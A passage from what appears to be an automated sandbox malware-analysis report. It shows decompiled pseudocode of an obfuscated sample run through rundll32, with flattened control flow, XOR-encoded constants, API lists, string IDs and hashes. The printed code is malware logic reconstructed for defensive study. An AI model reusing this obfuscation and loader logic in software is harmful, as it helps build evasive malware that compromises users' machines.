                                                                                                                                    				_v380 = 0xe44e59;
                                                                                                                                    				_v380 = _v380 + 0x7d25;
                                                                                                                                    				_v380 = _v380 + 0xffff00c0;
                                                                                                                                    				_v380 = _v380 << 0xa;
                                                                                                                                    				_v380 = _v380 ^ 0x8f30862d;
                                                                                                                                    				_v360 = 0x1cbdf;
                                                                                                                                    				_v360 = _v360 + 0xffff6e4b;
                                                                                                                                    				_v360 = _v360 >> 8;
                                                                                                                                    				_v360 = _v360 ^ 0x0001cec6;
                                                                                                                                    				_v348 = 0xf4499d;
                                                                                                                                    				_v348 = _v348 + 0x832d;
                                                                                                                                    				_v348 = _v348 << 2;
                                                                                                                                    				_v348 = _v348 ^ 0x03dc7480;
                                                                                                                                    				_v352 = 0x4c1d4a;
                                                                                                                                    				_v352 = _v352 >> 0xd;
                                                                                                                                    				_v352 = _v352 * 0xe;
                                                                                                                                    				_v352 = _v352 ^ 0x0003e302;
                                                                                                                                    				_v388 = 0x7e89b7;
                                                                                                                                    				_v388 = _v388 / _t419;
                                                                                                                                    				_t420 = 0x48;
                                                                                                                                    				_v388 = _v388 / _t420;
                                                                                                                                    				_t421 = 0x2b;
                                                                                                                                    				_t414 = _v368;
                                                                                                                                    				_v388 = _v388 / _t421;
                                                                                                                                    				_v388 = _v388 ^ 0x000ed69e;
                                                                                                                                    				_t422 = _v368;
                                                                                                                                    				_v300 = 0xe9da01;
                                                                                                                                    				_v300 = _v300 + 0xffffd878;
                                                                                                                                    				_v300 = _v300 ^ 0x00eb5be0;
                                                                                                                                    				_v336 = 0x6aaf6d;
                                                                                                                                    				_v336 = _v336 * 0x22;
                                                                                                                                    				_v336 = _v336 ^ 0x0e2b42a4;
                                                                                                                                    				_v316 = 0x54d710;
                                                                                                                                    				_v316 = _v316 >> 0xc;
                                                                                                                                    				_v316 = _v316 ^ 0x0000014d;
                                                                                                                                    				while(1) {
                                                                                                                                    					L1:
                                                                                                                                    					_t332 = 0x61250f6;
                                                                                                                                    					do {
                                                                                                                                    						while(1) {
                                                                                                                                    							L2:
                                                                                                                                    							_t427 = _t367 - _t332;
                                                                                                                                    							if(_t427 > 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							if(_t427 == 0) {
                                                                                                                                    								_t352 = E002D0AE0(0x40, 1);
                                                                                                                                    								_push(_v320);
                                                                                                                                    								_push( &_v260);
                                                                                                                                    								_push(_t352);
                                                                                                                                    								_push(0xb);
                                                                                                                                    								E002C80E3(_v364, _v304);
                                                                                                                                    								_t425 =  &(_t425[6]);
                                                                                                                                    								_t367 = 0x97954ea;
                                                                                                                                    								while(1) {
                                                                                                                                    									L1:
                                                                                                                                    									_t332 = 0x61250f6;
                                                                                                                                    									goto L2;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							if(_t367 == 0x2db8754) {
                                                                                                                                    								E002D8519(_v360, _v348, _v292);
                                                                                                                                    								E002D8519(_v352, _v388, _t422);
                                                                                                                                    								E002D8519(_v300, _v336, _v284);
                                                                                                                                    								_t367 = _t414;
                                                                                                                                    								L33:
                                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                                    								goto L34;
                                                                                                                                    							}
                                                                                                                                    							if(_t367 == 0x349a1a2) {
                                                                                                                                    								_t422 = 0;
                                                                                                                                    								E002C4B61( &_v260, 0x100, _v376, _v344);
                                                                                                                                    								_v284 = _v284 & 0;
                                                                                                                                    								_v280 = _v280 & 0;
                                                                                                                                    								_v292 = _v292 & 0;
                                                                                                                                    								_v288 = _v288 & 0;
                                                                                                                                    								_t367 = 0xea9523f;
                                                                                                                                    								while(1) {
                                                                                                                                    									L1:
                                                                                                                                    									_t332 = 0x61250f6;
                                                                                                                                    									goto L2;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							if(_t367 == 0x47b49b8) {
                                                                                                                                    								if(_v288 >= _v316) {
                                                                                                                                    									_t359 = E002DF435( &_v292,  &_v284);
                                                                                                                                    								} else {
                                                                                                                                    									_t359 = E002DA666( &_v292);
                                                                                                                                    								}
                                                                                                                                    								_t422 = _t359;
                                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                                    								_t367 =  !=  ? 0x61250f6 : 0x2db8754;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    							if(_t367 != 0x54d1846) {
                                                                                                                                    								goto L34;
                                                                                                                                    							}
                                                                                                                                    							_t386 =  *0x2e3e08; // 0x0
                                                                                                                                    							_t361 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 4))));
                                                                                                                                    							 *((intOrPtr*)(_t386 + 0x14)) =  *((intOrPtr*)(_t386 + 0x14)) + 1;
                                                                                                                                    							_t413 =  *((intOrPtr*)(_t386 + 0x14));
                                                                                                                                    							 *((intOrPtr*)(_t386 + 4)) = _t361;
                                                                                                                                    							if(_t361 == 0) {
                                                                                                                                    								 *((intOrPtr*)(_t386 + 4)) =  *((intOrPtr*)(_t386 + 0x20));
                                                                                                                                    							}
                                                                                                                                    							_t362 =  *0x2e3e08; // 0x0
                                                                                                                                    							if(_t413 >=  *_t362) {
                                                                                                                                    								_t387 =  *0x2e3e08; // 0x0
                                                                                                                                    								 *(_t387 + 0x14) =  *(_t387 + 0x14) & 0x00000000;
                                                                                                                                    								L37:
                                                                                                                                    								return _t364;
                                                                                                                                    							} else {
                                                                                                                                    								_t367 = 0x349a1a2;
                                                                                                                                    								while(1) {
                                                                                                                                    									L1:
                                                                                                                                    									_t332 = 0x61250f6;
                                                                                                                                    									goto L2;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_t367 == 0x70f4b52) {
                                                                                                                                    							E002D8519(_v372, _v380, _v276);
                                                                                                                                    							_t367 = 0x2db8754;
                                                                                                                                    							goto L33;
                                                                                                                                    						}
                                                                                                                                    						if(_t367 == 0x97954ea) {
                                                                                                                                    							_t335 =  *0x2e3e08; // 0x0
                                                                                                                                    							_t338 =  *0x2e3e08; // 0x0
                                                                                                                                    							_t343 =  *0x2e3e08; // 0x0
                                                                                                                                    							_t345 = E002DE395( *((intOrPtr*)( *((intOrPtr*)(_t343 + 4)) + 0x1a)),  &_v284,  &_v276, _v356, _v412,  &_v260, _v396, _t422, _v404, _v368,  *((intOrPtr*)(_t338 + 4)) + 0x1c, _v408,  *( *((intOrPtr*)(_t335 + 4)) + 0x18) & 0x0000ffff);
                                                                                                                                    							_t425 =  &(_t425[0xb]);
                                                                                                                                    							if(_t345 == 0) {
                                                                                                                                    								_t414 = 0x54d1846;
                                                                                                                                    								_t367 = 0x2db8754;
                                                                                                                                    							} else {
                                                                                                                                    								_t367 = 0xcdb2e90;
                                                                                                                                    							}
                                                                                                                                    							while(1) {
                                                                                                                                    								L1:
                                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                                    								goto L2;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_t367 == 0xcdb2e90) {
                                                                                                                                    							_t347 = E002C5548(_v324, _a24, _v332, _v340,  &_v276);
                                                                                                                                    							_t425 =  &(_t425[4]);
                                                                                                                                    							if(_t347 == 0) {
                                                                                                                                    								_t414 = 0x54d1846;
                                                                                                                                    							} else {
                                                                                                                                    								_t414 = 0xa80516a;
                                                                                                                                    								_t364 = 1;
                                                                                                                                    							}
                                                                                                                                    							_t367 = 0x70f4b52;
                                                                                                                                    							while(1) {
                                                                                                                                    								L1:
                                                                                                                                    								_t332 = 0x61250f6;
                                                                                                                                    								goto L2;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_t367 != 0xea9523f) {
                                                                                                                                    							goto L34;
                                                                                                                                    						}
                                                                                                                                    						_t349 = E002CCF47(_v296, _v384, _t423,  &_v292, _v400, _a8, _v312);
                                                                                                                                    						_t425 =  &(_t425[5]);
                                                                                                                                    						if(_t349 == 0) {
                                                                                                                                    							goto L37;
                                                                                                                                    						}
                                                                                                                                    						_t367 = 0x47b49b8;
                                                                                                                                    						goto L1;
                                                                                                                                    						L34:
                                                                                                                                    					} while (_t367 != 0xa80516a);
                                                                                                                                    					goto L37;
                                                                                                                                    				}
                                                                                                                                    			}






































































                                                                                                                                    0x002c6a7a
                                                                                                                                    0x002c6a7d
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c692f
                                                                                                                                    0x002c6a16
                                                                                                                                    0x002c6a25
                                                                                                                                    0x002c6a3d
                                                                                                                                    0x002c6a43
                                                                                                                                    0x002c6bc8
                                                                                                                                    0x002c6bc8
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bc8
                                                                                                                                    0x002c693b
                                                                                                                                    0x002c69d8
                                                                                                                                    0x002c69da
                                                                                                                                    0x002c69df
                                                                                                                                    0x002c69e6
                                                                                                                                    0x002c69ed
                                                                                                                                    0x002c69f4
                                                                                                                                    0x002c69fd
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6947
                                                                                                                                    0x002c6999
                                                                                                                                    0x002c69a9
                                                                                                                                    0x002c699b
                                                                                                                                    0x002c699b
                                                                                                                                    0x002c699b
                                                                                                                                    0x002c69ae
                                                                                                                                    0x002c69b7
                                                                                                                                    0x002c69bc
                                                                                                                                    0x00000000
                                                                                                                                    0x002c69bc
                                                                                                                                    0x002c694f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6955
                                                                                                                                    0x002c695e
                                                                                                                                    0x002c6960
                                                                                                                                    0x002c6963
                                                                                                                                    0x002c6966
                                                                                                                                    0x002c696b
                                                                                                                                    0x002c6970
                                                                                                                                    0x002c6970
                                                                                                                                    0x002c6973
                                                                                                                                    0x002c697a
                                                                                                                                    0x002c6bdb
                                                                                                                                    0x002c6be1
                                                                                                                                    0x002c6be8
                                                                                                                                    0x002c6bf1
                                                                                                                                    0x002c6980
                                                                                                                                    0x002c6980
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c697a
                                                                                                                                    0x002c6a8d
                                                                                                                                    0x002c6bbd
                                                                                                                                    0x002c6bc3
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bc3
                                                                                                                                    0x002c6a99
                                                                                                                                    0x002c6b34
                                                                                                                                    0x002c6b4c
                                                                                                                                    0x002c6b7d
                                                                                                                                    0x002c6b89
                                                                                                                                    0x002c6b8e
                                                                                                                                    0x002c6b93
                                                                                                                                    0x002c6b9f
                                                                                                                                    0x002c6ba4
                                                                                                                                    0x002c6b95
                                                                                                                                    0x002c6b95
                                                                                                                                    0x002c6b95
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6aa5
                                                                                                                                    0x002c6b0f
                                                                                                                                    0x002c6b14
                                                                                                                                    0x002c6b19
                                                                                                                                    0x002c6b25
                                                                                                                                    0x002c6b1b
                                                                                                                                    0x002c6b1d
                                                                                                                                    0x002c6b22
                                                                                                                                    0x002c6b22
                                                                                                                                    0x002c6b2a
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6916
                                                                                                                                    0x002c6aad
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6ad6
                                                                                                                                    0x002c6adb
                                                                                                                                    0x002c6ae0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6ae6
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bcd
                                                                                                                                    0x002c6bcd
                                                                                                                                    0x00000000
                                                                                                                                    0x002c6bd9

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: %}$?M\$W3pR$YN$bN-j$KL?$Ty$Ty$[$[
                                                                                                                                    • API String ID: 0-2895984816
                                                                                                                                    • Opcode ID: d6cd6d329ba87e568ec073a7283cc6e18d4dc02f583365c4ca35d155ad674d39
                                                                                                                                    • Instruction ID: 3ed2c22f3edb5d6eff843fb87519111f775cc90d43d939277e2d6e4f79f93e6f
                                                                                                                                    • Opcode Fuzzy Hash: d6cd6d329ba87e568ec073a7283cc6e18d4dc02f583365c4ca35d155ad674d39
                                                                                                                                    • Instruction Fuzzy Hash: AA0244725183809FC3A4CF65D589A5BBBE1FFC4308F208A0DF59A86260C7B0C959CF42
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog3.LIBCMT ref: 10021873
                                                                                                                                    • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 100218B4
                                                                                                                                      • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                    • PathIsUNCA.SHLWAPI(?), ref: 100218FE
                                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 1002191C
                                                                                                                                    • CharUpperA.USER32 ref: 10021943
                                                                                                                                    • FindFirstFileA.KERNEL32(?,00000000), ref: 10021954
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 10021960
                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 10021975
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3InformationNameThrowUpperVolumelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3249967234-0
                                                                                                                                    • Opcode ID: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                    • Instruction ID: 60a4613adf5c573b6f7ecf717c69f11d5bc108e5d701f0798ce0fed1b7752ca1
                                                                                                                                    • Opcode Fuzzy Hash: eb490681b6d568b073a389bcc3f25b73e071b185c17e64a21006f2b4c6435a32
                                                                                                                                    • Instruction Fuzzy Hash: 0E41DF7990024AAFEB11DFB4DC95AFF77BCEF14355F800529F815E2192EB30A944CA61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C5E60(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				char _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
	signed int _v40;
	signed int _v44;
	signed int _v48;
	signed int _v52;
	signed int _v56;
	signed int _v60;
	signed int _v64;
	signed int _v68;
	signed int _v72;
	signed int _v76;
	signed int _v80;
	signed int _v84;
	signed int _v88;
	signed int _v92;
	signed int _v96;
	signed int _v100;
	signed int _v104;
	signed int _v108;
	signed int _v112;
	signed int _v116;
	signed int _v120;
	signed int _v124;
	signed int _v128;
	signed int _v132;
	signed int _v136;
	signed int _v140;
	signed int _v144;
	signed int _v148;
	void* _t339;
	intOrPtr _t372;
	void* _t374;
	intOrPtr _t381;
	intOrPtr _t382;
	void* _t384;
	intOrPtr* _t385;
	void* _t387;
	intOrPtr _t421;
	intOrPtr* _t423;
	signed int _t424;
	signed int _t425;
	signed int _t426;
	signed int _t427;
	signed int _t428;
	signed int _t429;
	signed int _t430;
	signed int _t431;
	signed int _t432;
	signed int _t433;
	signed int _t434;
	signed int* _t437;

	_t385 = _a8;
	_push(_t385);
	_push(_a4);
	_t423 = __ecx;
	_push(__edx);
	_push(__ecx);
	E002D20B9(_t339);
	_v12 = 0xbcdf6a;
	_t437 =  &(( &_v148)[4]);
	_t421 = 0;
	_v8 = 0;
	_t387 = 0xc04f77e;
	_v92 = 0x11f6ef;
	_v92 = _v92 + 0xffffb184;
	_t424 = 0x71;
	_v92 = _v92 / _t424;
	_t425 = 0x24;
	_v92 = _v92 / _t425;
	_v92 = _v92 ^ 0x0000011d;
	_v56 = 0xfaa796;
	_v56 = _v56 >> 0xc;
	_v56 = _v56 << 0xa;
	_v56 = _v56 ^ 0x003ea801;
	_v36 = 0x1650e4;
	_v36 = _v36 + 0xce7;
	_v36 = _v36 ^ 0x00165dcb;
	_v116 = 0x54bb44;
	_v116 = _v116 + 0xffff1cdd;
	_v116 = _v116 + 0xffffa99d;
	_v116 = _v116 + 0xa8e5;
	_v116 = _v116 ^ 0x00542aa3;
	_v148 = 0xce1ee6;
	_v148 = _v148 ^ 0xff8bbe67;
	_v148 = _v148 | 0x521cb43f;
	_v148 = _v148 << 1;
	_v148 = _v148 ^ 0xfebb697e;
	_v52 = 0xc2bf1c;
	_v52 = _v52 << 0xc;
	_t426 = 0x73;
	_v52 = _v52 / _t426;
	_v52 = _v52 ^ 0x0061d2eb;
	_v88 = 0x8d6fba;
	_v88 = _v88 * 0x6a;
	_v88 = _v88 * 0x21;
	_v88 = _v88 >> 0xb;
	_v88 = _v88 ^ 0x00119314;
	_v48 = 0xec8dbc;
	_v48 = _v48 + 0xffff0a61;
	_v48 = _v48 | 0x0a9d8147;
	_v48 = _v48 ^ 0x0affcc17;
	_v24 = 0xd16d2c;
	_v24 = _v24 >> 2;
	_v24 = _v24 ^ 0x003dd5e6;
	_v124 = 0xaffa28;
	_v124 = _v124 >> 9;
	_v124 = _v124 * 9;
	_v124 = _v124 ^ 0x3775f33c;
	_v124 = _v124 ^ 0x377a4e54;
	_v76 = 0x9eb952;
	_v76 = _v76 >> 0xd;
	_v76 = _v76 << 0xa;
	_v76 = _v76 ^ 0x00160abd;
	_v108 = 0x8bec79;
	_t427 = 0x28;
	_v108 = _v108 * 0x30;
	_v108 = _v108 + 0xffff86d5;
	_v108 = _v108 + 0xffff5405;
	_v108 = _v108 ^ 0x1a3a719b;
	_v132 = 0x74267e;
	_v132 = _v132 + 0x1b76;
	_v132 = _v132 << 4;
	_v132 = _v132 + 0xffff1414;
	_v132 = _v132 ^ 0x074c11a2;
	_v100 = 0x4236e1;
	_v100 = _v100 ^ 0x96e608d5;
	_v100 = _v100 / _t427;
	_t428 = 0x2d;
	_v100 = _v100 * 0x6c;
	_v100 = _v100 ^ 0x96bd808a;
	_v84 = 0xb83730;
	_v84 = _v84 + 0xffffd15d;
	_v84 = _v84 >> 0xb;
	_v84 = _v84 ^ 0x0009ec33;
	_v140 = 0x532b06;
	_v140 = _v140 ^ 0xb0124270;
	_v140 = _v140 << 1;
	_v140 = _v140 / _t428;
	_v140 = _v140 ^ 0x02279f8d;
	_v44 = 0x33dfa;
	_v44 = _v44 + 0x1c37;
	_v44 = _v44 ^ 0x000817ba;
	_v136 = 0x1bf887;
	_v136 = _v136 ^ 0x189cf430;
	_v136 = _v136 + 0xffff0896;
	_v136 = _v136 ^ 0xf213b32f;
	_v136 = _v136 ^ 0xea9313b1;
	_v144 = 0xffa314;
	_v144 = _v144 >> 7;
	_v144 = _v144 ^ 0x35f9e2de;
	_t429 = 0x1f;
	_v144 = _v144 * 0x5b;
	_v144 = _v144 ^ 0x2f3e99d8;
	_v68 = 0x41f910;
	_v68 = _v68 / _t429;
	_v68 = _v68 ^ 0x28681de5;
	_v68 = _v68 ^ 0x2865ac71;
	_v96 = 0x6e33;
	_v96 = _v96 << 4;
	_v96 = _v96 ^ 0xe7b8475a;
	_v96 = _v96 << 1;
	_v96 = _v96 ^ 0xcf7b3a2b;
	_v104 = 0xedfca3;
	_t430 = 0x5e;
	_v104 = _v104 * 0x5f;
	_v104 = _v104 | 0x0b07679d;
	_v104 = _v104 ^ 0xc050dc4c;
	_v104 = _v104 ^ 0x9b058770;
	_v112 = 0xe25509;
	_v112 = _v112 ^ 0xf6d0fdca;
	_v112 = _v112 / _t430;
	_v112 = _v112 ^ 0x02984cdf;
	_v40 = 0xf7137d;
	_v40 = _v40 << 8;
	_v40 = _v40 ^ 0xf71f8dee;
	_v64 = 0x5508e8;
	_v64 = _v64 << 4;
	_v64 = _v64 | 0x94c676b5;
	_v64 = _v64 ^ 0x95dffb87;
	_v120 = 0xc732ae;
	_t431 = 0x75;
	_v120 = _v120 / _t431;
	_v120 = _v120 << 7;
	_t432 = 0x2c;
	_v120 = _v120 / _t432;
	_v120 = _v120 ^ 0x000601dd;
	_v72 = 0x179b9;
	_v72 = _v72 >> 1;
	_v72 = _v72 << 0xb;
	_v72 = _v72 ^ 0x05ec7a60;
	_v28 = 0x46261b;
	_t433 = 0x35;
	_v28 = _v28 / _t433;
	_v28 = _v28 ^ 0x000e773f;
	_v128 = 0xfd046c;
	_v128 = _v128 << 1;
	_v128 = _v128 << 3;
	_v128 = _v128 + 0xffff42a9;
	_v128 = _v128 ^ 0x0fc89804;
	_v60 = 0xb39cb2;
	_v60 = _v60 + 0xffffa360;
	_v60 = _v60 ^ 0x6e5a7866;
	_v60 = _v60 ^ 0x6eef17c9;
	_v32 = 0xb015d5;
	_t434 = 0x33;
	_v32 = _v32 / _t434;
	_v32 = _v32 ^ 0x00082471;
	_v80 = 0x87b3ae;
	_v80 = _v80 + 0xffffe530;
	_v80 = _v80 << 2;
	_v80 = _v80 ^ 0x021b575c;
	while(_t387 != 0x5e373ec) {
		if(_t387 == 0x87b20b3) {
			_t372 =  *0x2e3dfc; // 0x0
			_t374 = E002CCA90(_v96, _v56, _v104, _v112,  *((intOrPtr*)(_t423 + 4)), _v40, _t387, _v16, _t387,  &_v16, _v64, _v120, _v20, _v72, _v28, _v128, _v60, _v52,  *_t423,  *((intOrPtr*)(_t372 + 0x64)));
			_t437 =  &(_t437[0x12]);
			if(_t374 == _v88) {
				 *_t385 = _v20;
				_t421 = 1;
				 *((intOrPtr*)(_t385 + 4)) = _v16;
			} else {
				_t387 = 0x5e373ec;
				continue;
			}
		} else {
			if(_t387 == 0xc04f77e) {
				_t387 = 0xd382560;
				continue;
			} else {
				if(_t387 == 0xc68a5f7) {
					_push(_t387);
					_push(_t387);
                                                                                                                                    								_t381 = E002C7FF2(_v16);
                                                                                                                                    								_v20 = _t381;
                                                                                                                                    								if(_t381 != 0) {
                                                                                                                                    									_t387 = 0x87b20b3;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t387 != 0xd382560) {
                                                                                                                                    									L14:
                                                                                                                                    									if(_t387 != 0x4d23f0b) {
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									_t382 =  *0x2e3dfc; // 0x0
                                                                                                                                    									_t384 = E002CCA90(_v48, _v92, _v24, _v124,  *((intOrPtr*)(_t423 + 4)), _v76, _t387, _v36, _t387,  &_v16, _v108, _v132, _t421, _v100, _v84, _v140, _v44, _v116,  *_t423,  *((intOrPtr*)(_t382 + 0x64)));
                                                                                                                                    									_t437 =  &(_t437[0x12]);
                                                                                                                                    									if(_t384 == _v148) {
                                                                                                                                    										_t387 = 0xc68a5f7;
                                                                                                                                    										continue;
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t421;
                                                                                                                                    				}
                                                                                                                                    				E002D8519(_v32, _v80, _v20);
                                                                                                                                    				_t387 = 0x4d23f0b;
                                                                                                                                    				goto L14;
                                                                                                                                    			}





























































                                                                                                                                    0x002c64b1
                                                                                                                                    0x002c64b7
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c64bd
                                                                                                                                    0x002c635f
                                                                                                                                    0x002c635f
                                                                                                                                    0x002c63bd
                                                                                                                                    0x002c63c2
                                                                                                                                    0x002c63c9
                                                                                                                                    0x002c63cf
                                                                                                                                    0x00000000
                                                                                                                                    0x002c63cf
                                                                                                                                    0x002c63c9
                                                                                                                                    0x002c6359
                                                                                                                                    0x002c634d
                                                                                                                                    0x002c6341
                                                                                                                                    0x002c64e1
                                                                                                                                    0x002c64e1
                                                                                                                                    0x002c64a6
                                                                                                                                    0x002c64ac
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: U$3n$3$TNz7$`%8$`%8$fxZn$~&t$6B
                                                                                                                                    • API String ID: 0-1604698900
                                                                                                                                    • Opcode ID: 8757477f9be89197f703d328a2709dcf8fa9dbd1fa099bf4d46b4b62c8b98d11
                                                                                                                                    • Instruction ID: 8d7abfe1b734f12e1b4082e250fd8410202b409c52840e1256acf32cb2bc54a1
                                                                                                                                    • Opcode Fuzzy Hash: 8757477f9be89197f703d328a2709dcf8fa9dbd1fa099bf4d46b4b62c8b98d11
                                                                                                                                    • Instruction Fuzzy Hash: D9F100714087819FD368CF66D589A5BBBF1FBC4B48F10891DF29A86260D7B28859CF03
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Version$ClipboardFormatRegister
                                                                                                                                    • String ID: MSWHEEL_ROLLMSG
                                                                                                                                    • API String ID: 2888461884-2485103130
                                                                                                                                    • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                    • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                                    • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                    • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                    			E002DCB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				char _v520;
                                                                                                                                    				char _v1040;
                                                                                                                                    				char _v1560;
                                                                                                                                    				intOrPtr _v1564;
                                                                                                                                    				intOrPtr _v1568;
                                                                                                                                    				intOrPtr _v1572;
                                                                                                                                    				signed int _v1576;
                                                                                                                                    				signed int _v1580;
                                                                                                                                    				signed int _v1584;
                                                                                                                                    				signed int _v1588;
                                                                                                                                    				signed int _v1592;
                                                                                                                                    				signed int _v1596;
                                                                                                                                    				signed int _v1600;
                                                                                                                                    				signed int _v1604;
                                                                                                                                    				signed int _v1608;
